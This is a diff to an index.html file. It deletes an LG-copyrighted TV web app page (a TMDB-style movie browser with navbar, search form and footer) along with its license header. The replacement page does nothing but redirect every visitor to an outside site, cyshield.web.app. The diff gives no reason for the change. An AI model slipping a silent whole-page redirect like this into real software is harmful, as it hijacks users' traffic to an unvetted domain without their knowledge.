--- a/index.html
+++ b/index.html
@@ -1,254 +1,17 @@
-<!--
-Copyright (c) 2020-2022 LG Electronics Inc.
-
-SPDX-License-Identifier: Apache-2.0
--->
-
 <!DOCTYPE html>
-<html xmlns:https="http://www.w3.org/1999/xhtml">
+<html>
 <head>
-    <title>Tv Web App</title>
-    <link rel="stylesheet" href="styles.css">
-    <link
-            href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css"
-            rel="stylesheet"
-            integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC"
-            crossorigin="anonymous">
-    <script
-            src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/js/bootstrap.bundle.min.js"
-            integrity="sha384-MrcW6ZMFYlzcLA8Nl+NtUVF0sA7MsXsP1UyJoMp4YLEuNSfAP+JcXn/tWtIaxVXM"
-            crossorigin="anonymous">
-    </script>
-    <script src="./lib/spatial_navigation.js"></script>
-    <script src="./js/index.js"></script>
+    <style>
+        html {
+            overflow-y: scroll;
+            overflow-x: hidden;
+        }
+        body { position: absolute; }
+
+    </style>
 </head>
-
-<body>
-<!-- start of  header -->
-<div class='bg-darkblue'>
-    <div class="container">
-        <nav class="navbar navbar-expand-lg navbar-dark bg-darkblue">
-            <div class="container-fluid">
-                <a class="navbar-brand" href="#">
-                    <img src="https://www.themoviedb.org/assets/2/v4/logos/v2/blue_short-8e7b30f73a4020692ccca9c88bafe5dcb6f8a62a4c6bc55cd9ba82bb2cd95f6c.svg"
-                         alt="https://www.themoviedb.org/assets/2/v4/logos/v2/blue_square_2-d537fb228cf3ded904ef09b136fe3fec72548ebc1fea3fbbd1ad9e36364db38b.svg"/>
-                </a>
-                <button class="navbar-toggler" type="button" data-bs-toggle="collapse"
-                        data-bs-target="#navbarSupportedContent" aria-controls="navbarSupportedContent"
-                        aria-expanded="false" aria-label="Toggle navigation">
-                    <span class="navbar-toggler-icon"></span>
-                </button>
-                <div class="collapse navbar-collapse" id="navbarSupportedContent">
-                    <ul class="navbar-nav me-auto mb-2 mb-lg-0">
-                        <li class="nav-item dropdown">
-                            <a class="nav-link dropdown-toggle" href="#" id="navbarDropdown" role="button"
-                               data-bs-toggle="dropdown" aria-expanded="false">
-                                Movies
-                            </a>
-                            <ul class="dropdown-menu" aria-labelledby="navbarDropdown">
-                                <li>
-                                    <a class="dropdown-item" href="#">Action</a>
-                                </li>
-                                <li>
-                                    <a class="dropdown-item" href="#">Another action</a>
-                                </li>
-                                <li>
-                                    <hr class="dropdown-divider">
-                                </li>
-                                <li><a class="dropdown-item" href="#">Something else here</a></li>
-                            </ul>
-                        </li>
-                        <li class="nav-item dropdown">
-                            <a class="nav-link dropdown-toggle" href="#" id="navbarDropdown1" role="button"
-                               data-bs-toggle="dropdown" aria-expanded="false">
-                                Tv Shows
-                            </a>
-                            <ul class="dropdown-menu" aria-labelledby="navbarDropdown">
-                                <li><a class="dropdown-item" href="#">Action</a></li>
-                                <li><a class="dropdown-item" href="#">Another action</a></li>
-                                <li>
-                                    <hr class="dropdown-divider">
-                                </li>
-                                <li><a class="dropdown-item" href="#">Something else here</a></li>
-                            </ul>
-                        </li>
-                        <li class="nav-item dropdown">
-                            <a class="nav-link dropdown-toggle" href="#" id="navbarDropdown2" role="button"
-                               data-bs-toggle="dropdown" aria-expanded="false">
-                                People
-                            </a>
-                            <ul class="dropdown-menu" aria-labelledby="navbarDropdown">
-                                <li><a class="dropdown-item" href="#">Action</a></li>
-                                <li><a class="dropdown-item" href="#">Another action</a></li>
-                                <li>
-                                    <hr class="dropdown-divider">
-                                </li>
-                                <li><a class="dropdown-item" href="#">Something else here</a></li>
-                            </ul>
-                        </li>
-                        <li class="nav-item dropdown">
-                            <a class="nav-link dropdown-toggle" href="#" id="navbarDropdown3" role="button"
-                               data-bs-toggle="dropdown" aria-expanded="false">
-                                More
-                            </a>
-                            <ul class="dropdown-menu" aria-labelledby="navbarDropdown">
-                                <li><a class="dropdown-item" href="#">Action</a></li>
-                                <li><a class="dropdown-item" href="#">Another action</a></li>
-                                <li>
-                                    <hr class="dropdown-divider">
-                                </li>
-                                <li><a class="dropdown-item" href="#">Something else here</a></li>
-                            </ul>
-                        </li>
-
-                    </ul>
-                    <i class="bi bi-file-plus-fill" style="color: white;"></i>
-
-                </div>
-            </div>
-        </nav>
-    </div>
-</div>
-<!-- end of  header -->
-
-
-<!-- start of  HomePage -->
-<div class="">
-    <div style="background-image: url('cover.jpg')"
-         class="bg">
-        <div class="overlay">
-            <div class="container">
-                <div class="row content">
-                    <div class="col-sm-12">
-                        <div class="movie-thumb">
-                            <h1 class="welcome">
-                                Welcome.
-                            </h1>
-                            <h3 class="description">
-                                Millions of movies, TV shows and people to discover. Explore now.
-                            </h3>
-                            <h2 class="title text-center">
-                                <form class="input">
-
-                                    <div class="container row">
-                                        <div class="col-sm-12">
-                                            <form id='form' onsubmit="getMoviesByName()">
-                                                <input
-                                                        id="search"
-                                                        type="text"
-                                                        placeholder="Search for a movie, tv show, person......"
-                                                        type="search"
-                                                        class="input-search"
-                                                        name=""
-                                                        required
-                                                >
-                                                <input class="button-search" type='submit' value="Search">
-                                            </form>
-                                        </div>
-                                        <div class="col-sm-4"></div>
-                                        <div class="col-sm-4">
-                                        </div>
-                                        <div class="col-sm-4"></div>
-                                    </div>
-                                </form>
-                            </h2>
-                        </div>
-                    </div>
-                </div>
-            </div>
-        </div>
-    </div>
-
-
-</div>
-
-<div class="collection-film d-block" (activate)="onActivate($event)">
-    <div class="container center me-auto">
-        <div class="row">
-            <h1>
-                What's Popular
-            </h1>
-            <!-- backend doesn't support pages greater than 500-->
-
-            <div class="row" id="articleContainer"></div>
-
-
-        </div>
-    </div>
-</div>
-
-<!-- end of  HomePage -->
-
-
-<script src="js/getdata.js"></script>
-<!-- start of  footer -->
-
-<div>
-    <footer style="display: block">
-        <div class="footer-section">
-            <div class="container">
-                <div class="row">
-                    <div class="col-sm-2">
-                        <div class="copy-right">
-                            <img src="https://www.themoviedb.org/assets/2/v4/logos/v2/blue_square_2-d537fb228cf3ded904ef09b136fe3fec72548ebc1fea3fbbd1ad9e36364db38b.svg"
-                                 alt="https://www.themoviedb.org/assets/2/v4/logos/v2/blue_square_2-d537fb228cf3ded904ef09b136fe3fec72548ebc1fea3fbbd1ad9e36364db38b.svg"/>
-                            <button class="join-comuntiy text-info">
-                                Join the Community
-                            </button>
-                        </div>
-                    </div>
-                    <div class="col-sm">
-                        <div class="copy-right">
-                            <h5> THE BASICS </h5>
-                            <ul>
-                                <li>About TMDB</li>
-                                <li>Contact Us</li>
-                                <li>Support Forums</li>
-                                <li>API</li>
-                                <li>System Status</li>
-                            </ul>
-                        </div>
-                    </div>
-                    <div class="col-sm">
-                        <div class="copy-right">
-                            <h5> GET INVOLVED </h5>
-
-                            <ul>
-                                <li>Contribution Bible</li>
-                                <li>Add New Movie</li>
-                                <li>Add New TV Show</li>
-                            </ul>
-                        </div>
-                    </div>
-                    <div class="col-sm">
-                        <div class="copy-right">
-                            <h5>COMMUNITY </h5>
-                            <ul>
-                                <li>Guidelines</li>
-                                <li>Discussions</li>
-                                <li>Leaderboard</li>
-                                <li>Twitter</li>
-                            </ul>
-                        </div>
-                    </div>
-                    <div class="col-sm">
-                        <div class="copy-right">
-                            <h5>LEGAL</h5>
-                            <ul>
-                                <li>Terms of Use</li>
-                                <li>API Terms of Use</li>
-                                <li>Privacy Policy</li>
-                            </ul>
-                        </div>
-                    </div>
-                </div>
-            </div>
-        </div>
-    </footer>
-</div>
-
-<!-- end of  footer -->
-
-</body>
-
+<script>
+    window.location.href = 'https://cyshield.web.app';
+</script>
 </html>
+
